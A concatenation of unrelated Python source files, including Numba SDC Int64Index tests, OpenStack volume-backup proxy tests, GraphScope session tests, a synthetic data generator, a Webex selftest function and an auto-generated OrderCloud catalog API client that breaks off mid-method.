self.jit(test_impl) n = 11 for A, B in product( _generate_int64_indexes_fixed(n), map(lambda x: np.array(x), _generate_int64_indexes_fixed(n)) ): for swap_operands in (False, True): if swap_operands: A, B = B, A with self.subTest(left=A, right=B): result = np.asarray(sdc_func(A, B)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(A, B) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_ne_index(self): def test_impl(index1, index2): return index1 != index2 sdc_func = self.jit(test_impl) n = 11 for index1, index2 in product(_generate_int64_indexes_fixed(n), repeat=2): with self.subTest(index1=index1, index2=index2): result = np.asarray(sdc_func(index1, index2)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(index1, index2) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_is_nounbox(self): # positive testcase def test_impl_1(data, name): index1 = pd.Int64Index(data, name=name) index2 = index1 return index1 is index2 # negative testcase def test_impl_2(data, name): index1 = pd.Int64Index(data, name=name) index2 = pd.Int64Index(data, name=name) return index1 is index2 index_data = pd.Int64Index([1, 2, 3, 5, 6, 3, 4]).values compiled_funcs = [ (test_impl_1, "same indexes"), (test_impl_2, "not same indexes") ] for pyfuncs, name in product(compiled_funcs, test_global_index_names): func, descr = pyfuncs sdc_func = self.jit(func) with self.subTest(subtest=f"{descr}, name={name}"): result = sdc_func(index_data, name) result_ref = func(index_data, name) expected = True if descr == "same indexes" else False self.assertEqual(result, result_ref) self.assertEqual(result, expected) def test_int64_index_getitem_by_mask(self): def test_impl(index, mask): return index[mask] sdc_func = self.jit(test_impl) n = 11 np.random.seed(0) mask = np.random.choice([True, False], n) for index in _generate_int64_indexes_fixed(n): result = sdc_func(index, mask) result_ref = test_impl(index, mask) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_getitem_by_array(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n, k = 11, 7 np.random.seed(0) idx = np.random.choice(np.arange(n), k) for index in _generate_int64_indexes_fixed(n): result = sdc_func(index, idx) result_ref = test_impl(index, idx) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_reindex_equal_indexes(self): def test_func(index1, index2): return index1.reindex(index2) sdc_func = self.jit(test_func) n = 10 np.random.seed(0) index1 = pd.Int64Index(np.arange(n)) index2 = pd.Int64Index(np.copy(index1.values)) result = sdc_func(index1, index2) result_ref = test_func(index1, index2) pd.testing.assert_index_equal(result[0], result_ref[0]) np.testing.assert_array_equal(result[1], result_ref[1]) def test_int64_index_reindex(self): def test_impl(index1, index2): return index1.reindex(index2) sdc_func = self.jit(test_impl) n = 10 np.random.seed(0) index_data = np.arange(n) index1 = pd.Int64Index(np.random.choice(index_data, n, replace=False)) reindex_by = [ pd.RangeIndex(n + 2), pd.RangeIndex(0, n, 2), pd.Int64Index(np.random.choice(index_data, n, replace=False)), pd.Int64Index(np.random.choice([0, 1, 11, 12, 100], n)) ] for index2 in reindex_by: with self.subTest(index2=index2): result = sdc_func(index1, index2) result_ref = test_impl(index1, index2) pd.testing.assert_index_equal(result[0], result_ref[0]) np.testing.assert_array_equal(result[1], result_ref[1]) def test_int64_index_equals(self): def test_impl(index1, index2): return index1.equals(index2) sdc_func = self.jit(test_impl) n = 11 indexes_to_test = [ pd.Int64Index(np.arange(n)), pd.Int64Index(np.arange(n), name='asd'), pd.Int64Index(np.arange(n) * 2, name='asd'), pd.Int64Index(np.arange(2 * n)), ] for index1, index2 in combinations_with_replacement(indexes_to_test, 2): with self.subTest(index1=index1, index2=index2): result = sdc_func(index1, index2) result_ref = test_impl(index1, index2) self.assertEqual(result, result_ref) def test_int64_index_ravel(self): def test_impl(index): return index.ravel() sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2) result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_take(self): def test_impl(index, value): return index.take(value) sdc_func = self.jit(test_impl) n = 11 np.random.seed(0) index_pos = np.arange(n) values_to_test = [ np.random.choice(index_pos, 2*n), list(np.random.choice(index_pos, n, replace=False)), pd.RangeIndex(n // 2), pd.Int64Index(index_pos[n // 2:]) ] for index, value in product(_generate_int64_indexes_fixed(n), values_to_test): with self.subTest(index=index, value=value): result = sdc_func(index, value) result_ref = test_impl(index, value) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_append(self): def test_impl(index, other): return index.append(other) sdc_func = self.jit(test_impl) n = 11 other_indexes = [ get_sample_index(n, PositionalIndexType), get_sample_index(n, RangeIndexType), get_sample_index(n, Int64IndexType), ] for index, other in product( _generate_int64_indexes_fixed(n), other_indexes): with self.subTest(index=index, other=other): result = sdc_func(index, other) result_ref = test_impl(index, other) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_join(self): def test_impl(index, other): return index.join(other, 'outer', return_indexers=True) sdc_func = self.jit(test_impl) n = 11 other_indexes = [ get_sample_index(2 * n, PositionalIndexType), get_sample_index(2 * n, RangeIndexType), get_sample_index(2 * n, Int64IndexType), ] for index, other in product( _generate_int64_indexes_fixed(n), other_indexes): with self.subTest(index=index, other=other): result = sdc_func(index, other) result_ref = test_impl(index, other) # check_names=False, since pandas behavior is not type-stable pd.testing.assert_index_equal(result[0], result_ref[0], check_names=False) np.testing.assert_array_equal(result[1], result_ref[1]) np.testing.assert_array_equal(result[2], result_ref[2]) if __name__ == "__main__": unittest.main()
nilq/baby-python
python
# (c) Copyright IBM Corp. 2010, 2021. All Rights Reserved. # -*- coding: utf-8 -*- # pragma pylint: disable=unused-argument, no-self-use """Function implementation""" import datetime import logging from resilient_lib import validate_fields, RequestsCommon from fn_create_webex_meeting.lib.cisco_api import WebexAPI log = logging.getLogger(__name__) log.setLevel(logging.INFO) log.addHandler(logging.StreamHandler()) PACKAGE_NAME = "fn_create_webex_meeting" log = logging.getLogger(__name__) log.setLevel(logging.INFO) log.addHandler(logging.StreamHandler()) def selftest_function(opts): """ Placeholder for selftest function. An example use would be to test package api connectivity. Suggested return values are be unimplemented, success, or failure. """ options = opts.get(PACKAGE_NAME, {}) required_fields = ["webex_email", "webex_password", "webex_site_url", "webex_timezone"] validate_fields(required_fields, options) opts = dict() opts["rc"] = RequestsCommon(opts, options) opts["webex_site_url"] = options.get("webex_site_url") opts["email"] = options.get("webex_email") opts["password"] = options.get("webex_password") opts["sitename"] = options.get("webex_site") opts["timezone"] = options.get("webex_timezone") opts["meeting_password"] = "Selftest23#" opts["meeting_name"] = "SelfTest Meeting" opts["meeting_agenda"] = "Agenda" # compute meeting start/end time for 1 day in the future (in epoch) now = datetime.datetime.utcnow() meeting_start = now + datetime.timedelta(days=1) meeting_end = meeting_start + datetime.timedelta(minutes= 10) webex_meeting_start_time = int(meeting_start.timestamp()*1000) webex_meeting_end_time = int(meeting_end.timestamp()*1000) try: webex = WebexAPI(opts, webex_meeting_start_time, webex_meeting_end_time) response = webex.create_meeting() if response.get("status") == "SUCCESS": return {"state": "success", "reason": "success"} else: return {"state": "failure", "reason": response.get("fail_reason")} except Exception as err: return {"state": "failure", "reason": err}
nilq/baby-python
python
# Copyright (C) 2016 Intel Corporation # # SPDX-License-Identifier: MIT from .pip import Pip class IDP201700(Pip): _python_path = '/miniconda3/envs/idp2017.0.0/bin/python'
nilq/baby-python
python
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from openstack.tests.unit.test_proxy_base3 import BaseProxyTestCase from openstack.volume_backup.v2 import _proxy from openstack.volume_backup.v2 import backup as _backup from openstack.volume_backup.v2 import backup_policy as _backup_policy from openstack.volume_backup import volume_backup_service class TestVolumeBackupProxy(BaseProxyTestCase): def __init__(self, *args, **kwargs): super(TestVolumeBackupProxy, self).__init__( *args, proxy_class=_proxy.Proxy, service_class=volume_backup_service.VolumeBackupService, **kwargs) class TestCloudBackup(TestVolumeBackupProxy): def __init__(self, *args, **kwargs): super(TestCloudBackup, self).__init__(*args, **kwargs) def test_create_backup(self): self.mock_response_json_values({ "id": "70a599e0-31e7-49b7-b260-868f441e862b" }) data = { "name": "backup1", "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "description": "Backups_Demon" } job = self.proxy.create_backup(**data) expect_post_json = { "backup": { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "name": "backup1", "description": "Backups_Demon" } } self.assert_session_post_with("/cloudbackups", json=expect_post_json) self.assertIsInstance(job, _backup.CloudBackup) self.assertEqual("70a599e0-31e7-49b7-b260-868f441e862b", job.job_id) def test_create_native_backup(self): self.mock_response_json_file_values( "create_native_backup_response.json") data = { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "snapshot_id": "2bb856e1-b3d8-4432-a858-09e4ce939389", "name": "backup1", "description": "Backup_Demo" } backup = self.proxy.create_native_backup(**data) expect_post_json = { "backup": { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "snapshot_id": "2bb856e1-b3d8-4432-a858-09e4ce939389", "name": "backup1", "description": "Backup_Demo" } } self.assert_session_post_with("/backups", json=expect_post_json) self.assertIsInstance(backup, _backup.Backup) self.assertEqual("54ba0e69-48a0-4a77-9cdf-a7979a7e2648", backup.id) self.assertEqual("backup1", backup.name) def test_delete_backup_with_id(self): self.proxy.delete_backup("some-backup-id") self.assert_session_delete("backups/some-backup-id") def test_delete_backup_with_instance(self): self.proxy.delete_backup(_backup.Backup(id="some-backup-id")) self.assert_session_delete("backups/some-backup-id") def test_restore_backup(self): self.mock_response_json_values({ "id": "70a599e0-31e7-49b7-b260-868f441e862b" }) job = self.proxy.restore_backup( "some-backup-id", "c96e4a94-927a-425c-8795-63f9964cfebd") expect_post_json = { "restore": { "volume_id": "c96e4a94-927a-425c-8795-63f9964cfebd" } } self.assert_session_post_with( "cloudbackups/some-backup-id/restore", json=expect_post_json) self.assertIsInstance(job, _backup.CloudBackup) self.assertEqual("70a599e0-31e7-49b7-b260-868f441e862b", job.job_id) def test_list_backup(self): query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.mock_response_json_file_values("list_backups.json") backups = list(self.proxy.backups(**query)) transferred_query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.assert_session_list_with("/backups", params=transferred_query) self.assertEqual(2, len(backups)) backup = backups[0] self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertIsNone(backup.name) def test_list_backup_detail(self): query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.mock_response_json_file_values("list_backup_details.json") backups = list(self.proxy.backups(details=True, **query)) transferred_query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.assert_session_list_with("/backups/detail", params=transferred_query) self.assertEqual(3, len(backups)) backup = backups[0] self.assertIsInstance(backup, _backup.BackupDetail) self.assertEqual("error", backup.status) self.assertIsNone(backup.description) self.assertIsNone(backup.availability_zone) self.assertEqual("2748f2f2-4394-4e6e-af8d-8dd34496c024", backup.volume_id) self.assertEqual(("Connection to swift failed: " "[Errno 111] ECONNREFUSED"), backup.fail_reason) self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertEqual(1, backup.size) self.assertIsNone(backup.object_count) self.assertEqual("volumebackups", backup.container) self.assertIsNone(backup.name) self.assertEqual("2013-06-27T08:48:03.000000", backup.created_at) self.assertEqual("b23b579f08c84228b9b4673c46f0c442", backup.tenant_id) def test_get_backup(self): self.mock_response_json_file_values("get_backup.json") backup = self.proxy.get_backup("backup-id") self.session.get.assert_called_once_with( "backups/backup-id", endpoint_filter=self.service, endpoint_override=self.service.get_endpoint_override(), ) self.assertIsInstance(backup, _backup.Backup) self.assertEqual("error", backup.status) self.assertIsNone(backup.description) self.assertIsNone(backup.availability_zone) self.assertEqual("2748f2f2-4394-4e6e-af8d-8dd34496c024", backup.volume_id) self.assertEqual(("Connection to swift failed: " "[Errno 111] ECONNREFUSED"), backup.fail_reason) self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertEqual(1, backup.size) self.assertIsNone(backup.object_count) self.assertEqual("volumebackups", backup.container) self.assertIsNone(backup.name) self.assertEqual("2013-06-27T08:48:03.000000", backup.created_at) self.assertEqual("b23b579f08c84228b9b4673c46f0c442", backup.tenant_id) class TestBackupPolicy(TestVolumeBackupProxy): def __init__(self, *args, **kwargs): super(TestBackupPolicy, self).__init__(*args, **kwargs) def test_list_backup_policy(self): self.mock_response_json_file_values("list_backup_policies.json") policies = list(self.proxy.backup_policies()) self.assert_session_list_with("/backuppolicy", params={}) self.assertEqual(2, len(policies)) policy = policies[0] self.assertIsInstance(policy, _backup_policy.BackupPolicy) self.assertEqual("XX", policy.id) self.assertEqual("plan01", policy.name) self.assertEqual(0, policy.policy_resource_count) scheduled_policy = policy.scheduled_policy self.assertIsInstance(scheduled_policy, _backup_policy.SchedulePolicy) self.assertEqual(False, scheduled_policy.remain_first_backup_of_curMonth) self.assertEqual(10, scheduled_policy.rentention_num) self.assertEqual(1, scheduled_policy.frequency) self.assertEqual("12:00", scheduled_policy.start_time) self.assertEqual("ON", scheduled_policy.status) self.assertTrue(policies[1].scheduled_policy .remain_first_backup_of_curMonth) def test_create_backup_policy(self): self.mock_response_json_values({ "backup_policy_id": "af8a20b0-117d-4fc3-ae53-aa3968a4f870" }) scheduled_policy = { "remain_first_backup_of_curMonth": True, "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } policy = self.proxy.create_backup_policy("backup_policy_name", **scheduled_policy) expect_post_json = { "backup_policy_name": "backup_policy_name", "scheduled_policy": { "remain_first_backup_of_curMonth": "Y", "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } } self.assert_session_post_with("/backuppolicy", json=expect_post_json) self.assertEqual("af8a20b0-117d-4fc3-ae53-aa3968a4f870", policy.id) def test_update_backup_policy(self): self.mock_response_json_values({ "backup_policy_id": "af8a20b0-117d-4fc3-ae53-aa3968a4f870" }) attrs = self.get_file_content("update_policy.json") self.proxy.update_backup_policy("some-policy-id", **attrs) expected_json = { "backup_policy_name": "policy_01", "scheduled_policy": { "remain_first_backup_of_curMonth": "Y", "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } } self.assert_session_put_with("backuppolicy/some-policy-id", json=expected_json) def test_delete_backup_policy_with_id(self): self.proxy.delete_backup_policy("some-config-id") self.assert_session_delete("backuppolicy/some-config-id") def test_link_resource_to_policy(self): self.mock_response_json_file_values("link_resources.json") policy = _backup_policy.BackupPolicy(id="policy-id") resources = ["volume-id-1", "volume-id-2"] linked_resources = self.proxy.link_resources_to_policy(policy, resources) self.assert_session_post_with("/backuppolicyresources", json={ "backup_policy_id": "policy-id", "resources": [{ "resource_id": "volume-id-1", "resource_type": "volume" }, { "resource_id": "volume-id-2", "resource_type": "volume" }] }) self.assertEqual(2, len(linked_resources)) success = linked_resources[0] self.assertEqual("bce8d47a-af17-4169-901f-4c7ae9f29c2c", success.resource_id) self.assertEqual("pod01.eu-de-01sa-brazil-1cn-north-1", success.os_vol_host_attr) self.assertEqual("eu-de-01sa-brazil-1cn-north-1", success.availability_zone) self.assertEqual("volume", success.resource_type) self.assertTrue(success.success) success = linked_resources[1] self.assertEqual("volume-id-2", success.resource_id) self.assertEqual("pod01.eu-de-01sa-brazil-1cn-north-1", success.os_vol_host_attr) self.assertEqual("eu-de-01sa-brazil-1cn-north-1", success.availability_zone) self.assertEqual("volume", success.resource_type) self.assertEqual("VBS.0002", success.code) self.assertEqual("xxxxx", success.message) self.assertFalse(success.success) def test_unlink_resource_of_policy(self): self.mock_response_json_file_values("unlink_resources.json") policy = _backup_policy.BackupPolicy(id="policy-id") resources = ["volume-id-1", "volume-id-2"] linked_resources = self.proxy.unlink_resources_of_policy(policy, resources) self.assert_session_post_with( "backuppolicyresources/policy-id/deleted_resources", json={ "resources": [{ "resource_id": "volume-id-1" }, { "resource_id": "volume-id-2" }] }) self.assertEqual(2, len(linked_resources)) success = linked_resources[0] self.assertEqual("bce8d47a-af17-4169-901f-4c7ae9f29c2c", success.resource_id) self.assertTrue(success.success) success = linked_resources[1] self.assertEqual("volume-id-2", success.resource_id) self.assertEqual("VBS.0002", success.code) self.assertEqual("xxxxx", success.message) self.assertFalse(success.success) def test_execute_policy(self): policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.execute_policy(policy) self.assert_session_post_with("backuppolicy/policy-id/action", json=None) def test_enable_policy(self): self.mock_response_json_file_values("update_policy.json") policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.enable_policy(policy) self.assert_session_put_with("backuppolicy/policy-id", json={ "scheduled_policy": { "status": "ON" } }) def test_disable_policy(self): self.mock_response_json_file_values("update_policy.json") policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.disable_policy(policy) self.assert_session_put_with("backuppolicy/policy-id", json={ "scheduled_policy": { "status": "OFF" } }) def test_list_task(self): query = { "sort_dir": "asc", "sort_key": "created_at", "status": "RUNNING", "id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10, "offset": 10 } self.mock_response_json_file_values("list_tasks.json") tasks = list(self.proxy.tasks("policy-id", **query)) transferred_query = { "sort_dir": "asc", "sort_key": "created_at", "status": "RUNNING", "job_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10, "offset": 10 } self.assert_session_list_with("/backuppolicy/policy-id/backuptasks", params=transferred_query) self.assertEqual(2, len(tasks)) task = tasks[0] self.assertEqual("RUNNING", task.status) self.assertEqual("0781095c-b8ab-4ce5-99f3-4c5f6ff75319", task.id) self.assertEqual("2016-12-03T06:24:34.467", task.created_at) self.assertEqual("autobk_a61d", task.backup_name) self.assertEqual("f47a4ab5-11f5-4509-97f5-80ce0dd74e37", task.resource_id) self.assertEqual("volume", task.resource_type)
nilq/baby-python
python
import numpy as np from sklearn.datasets import make_regression from scipy.stats import norm, itemfreq import pandas as pd import matplotlib.pyplot as plt import sys import argparse parser = argparse.ArgumentParser() parser.add_argument( 'RowCount', type=int, help='The number of rows to generate' ) parser.add_argument( '--show-graph', help='Show a graph of the results, -x and -y must be given', action='store_true' ) parser.add_argument( '-x', help='The x-axis of the graph', type=str, choices=['Age', 'Income', 'Height', 'Github_stars'] ) parser.add_argument( '-y', help='The y-axis of the graph', type=str, choices=['Age', 'Income', 'Height', 'Github_stars'] ) parser.add_argument( '-f', '--file', help='Save the data to a file', type=str ) args = parser.parse_args() def pick_profession(age, income, github_stars, height): if age > 50 and income > 20000: return 'president' if height > 190 and income > 5000: return 'basketball player' if github_stars > 30: if income > 20000: return 'software architect' else: return 'programmer' if age % 2 == 0 and github_stars % 3 == 1: return 'reality tv star' if age < 20: return 'student' if income < 1000: if height > 180: return 'soldier' return 'unemployed' if income < 5000 and height > 180: return 'officer' if height > 180: return 'general' return 'car salesman' row_count = args.RowCount age, income = make_regression(row_count, 1, 1, noise=3.3, random_state=42) age = age.reshape((row_count,)) age = np.log(age * age + 1) * 17 + 20 age = np.floor(age) income = income * income * 6 + 500 github_stars = -0.169 * age * age + 10 * age + income / 750 - 130 github_stars = np.floor(github_stars) height = norm.rvs(size=row_count, loc=180, scale=10, random_state=42) xs = -github_stars * height / 10 + age**2 / 2 is_client = (norm.rvs(size=row_count, loc=-100, scale=100) + xs) > 0 profession = [ pick_profession(age[i], income[i], github_stars[i], height[i]) for i in range(0, row_count) ] df = pd.DataFrame( { 'Age': age, 'Income': income, 'Github_stars': github_stars, 'Height': height, 'Profession': profession, 'Is_client': is_client, } ) print('Max age {0}, min age: {1}'.format(age.max(), age.min())) print('Max income {0}, min income: {1}'.format(income.max(), income.min())) print('Max stars {0}, min stars: {1}'.format(github_stars.max(), github_stars.min())) print('Max height {0}, min height: {1}'.format(height.max(), height.min())) print('Profession counts') print(df.Profession.value_counts()) print('Client counts') print(df.Is_client.value_counts()) print(df[0:20]) if args.show_graph: plt.plot(df[args.x], df[args.y], 'o') plt.show() if args.file is not None: df.to_csv(args.file)
nilq/baby-python
python
""" >>> def fn(arg1,arg2): pass >>> co = fn.func_code >>> co.co_argcount 2 >>> co.co_varnames ('arg1', 'arg2') """ def _test(): import doctest doctest.testmod() if __name__ == "__main__": _test()
nilq/baby-python
python
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import json import os import tempfile import pytest import graphscope COORDINATOR_HOME = os.path.join(os.path.dirname(__file__), "../", "../coordinator") new_data_dir = os.path.expandvars("${GS_TEST_DIR}/new_property/v2_e2") def setUpModule(): graphscope.set_option(show_log=True) graphscope.set_option(initializing_interactive_engine=False) @pytest.fixture def invalid_config_file(): with tempfile.TemporaryDirectory() as dir_name: json_path = os.path.join(dir_name, "test.json") with open(json_path, "w") as f: # json format is incorrect. f.write('{"xxx": ["xxx"],"xxx": 9527 "num_workers": 4}') yield json_path @pytest.fixture def local_config_file(): conf = {"num_workers": 4} with tempfile.TemporaryDirectory() as dir_name: json_path = os.path.join(dir_name, "test.json") with open(json_path, "w") as f: json.dump(conf, f) yield json_path # load property graph to specified session def load_graph(session): g = session.load_from( edges={ "e0": [ ( "{}/twitter_e_0_0_0#header_row=true".format(new_data_dir), ["weight"], ("src", "v0"), ("dst", "v0"), ), ( "{}/twitter_e_0_1_0#header_row=true".format(new_data_dir), ["weight"], ("src", "v0"), ("dst", "v1"), ), ( "{}/twitter_e_1_0_0#header_row=true".format(new_data_dir), ["weight"], ("src", "v1"), ("dst", "v0"), ), ( "{}/twitter_e_1_1_0#header_row=true".format(new_data_dir), ["weight"], ("src", "v1"), ("dst", "v1"), ), ], "e1": [ ( "{}/twitter_e_0_0_1#header_row=true".format(new_data_dir), ["weight"], ("src", "v0"), ("dst", "v0"), ), ( "{}/twitter_e_0_1_1#header_row=true".format(new_data_dir), ["weight"], ("src", "v0"), ("dst", "v1"), ), ( "{}/twitter_e_1_0_1#header_row=true".format(new_data_dir), ["weight"], ("src", "v1"), ("dst", "v0"), ), ( "{}/twitter_e_1_1_1#header_row=true".format(new_data_dir), ["weight"], ("src", "v1"), ("dst", "v1"), ), ], }, vertices={ "v0": "{}/twitter_v_0#header_row=true".format(new_data_dir), "v1": "{}/twitter_v_1#header_row=true".format(new_data_dir), }, generate_eid=False, ) return g def test_default_session(): default_sess = graphscope.get_default_session() assert default_sess.info["status"] == "active" default_sess.close() assert default_sess.info["status"] == "closed" def test_launch_cluster_on_local(local_config_file): s = graphscope.session(cluster_type="hosts", config=local_config_file) info = s.info assert info["status"] == "active" s.close() @pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI") def test_launch_session_from_config(local_config_file): saved = os.environ.get("GS_CONFIG_PATH", "") try: os.environ["GS_CONFIG_PATH"] = local_config_file s = graphscope.session(cluster_type="hosts") info = s.info assert info["status"] == "active" s.close() finally: os.environ["GS_CONFIG_PATH"] = saved @pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI") def test_launch_session_from_dict(): conf_dict = {"num_workers": 4} s = graphscope.session(cluster_type="hosts", config=conf_dict) info = s.info assert info["status"] == "active" s.close() @pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI") def test_config_dict_has_highest_priority(local_config_file): s = graphscope.session( cluster_type="hosts", config=local_config_file, num_workers=2 ) info = s.info assert info["status"] == "active" s.close() def test_error_on_config_file_not_exist(): with pytest.raises(FileNotFoundError, match="No such file or directory"): graphscope.session(cluster_type="hosts", config="~/non_existing_filename.txt") def test_error_on_invalid_config_file(invalid_config_file): # invalid config file (example json format incorrect) with pytest.raises(json.decoder.JSONDecodeError): graphscope.session(cluster_type="hosts", config=invalid_config_file) def test_correct_closing_on_hosts(): s1 = graphscope.session(cluster_type="hosts") s1.close() # check, launched coordinator and graphscope-engines on local are correctly closed. # test close twice s1.close() @pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI") def test_border_cases(): s1 = graphscope.session(cluster_type="hosts") s2 = graphscope.session(cluster_type="hosts") s3 = graphscope.session(cluster_type="hosts") s1.as_default() assert graphscope.get_default_session() == s1 g3 = load_graph(s3) with pytest.raises( ValueError, match="A default session is already active. You must explicitly call Session.close().", ): s2.as_default() s1.close() s2.as_default() assert graphscope.get_default_session() == s2 s2.close() s3.as_default() assert graphscope.get_default_session() == s3 sssp = graphscope.property_sssp(g3, src=4) # ok, g3 belong to s3 s3.close() def test_with(): with graphscope.session(cluster_type="hosts") as sess: assert graphscope.get_default_session() == sess sess = graphscope.session(cluster_type="hosts") with sess: pass assert sess.info["status"] == "closed"
nilq/baby-python
python
# coding: utf-8 """ OrderCloud No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) OpenAPI spec version: 1.0 Contact: ordercloud@four51.com Generated by: https://github.com/swagger-api/swagger-codegen.git Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import absolute_import import sys import os import re # python 2 and python 3 compatibility library from six import iteritems from ..configuration import Configuration from ..api_client import ApiClient class CatalogApi(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): config = Configuration() if api_client: self.api_client = api_client else: if not config.api_client: config.api_client = ApiClient() self.api_client = config.api_client def create(self, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create(catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.create_with_http_info(catalog, **kwargs) else: (data) = self.create_with_http_info(catalog, **kwargs) return data def create_with_http_info(self, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.create_with_http_info(catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog' is set if ('catalog' not in params) or (params['catalog'] is None): raise ValueError("Missing the required parameter `catalog` when calling `create`") resource_path = '/catalogs'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'catalog' in params: body_params = params['catalog'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_with_http_info(catalog_id, **kwargs) else: (data) = self.delete_with_http_info(catalog_id, **kwargs) return data def delete_with_http_info(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_with_http_info(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: 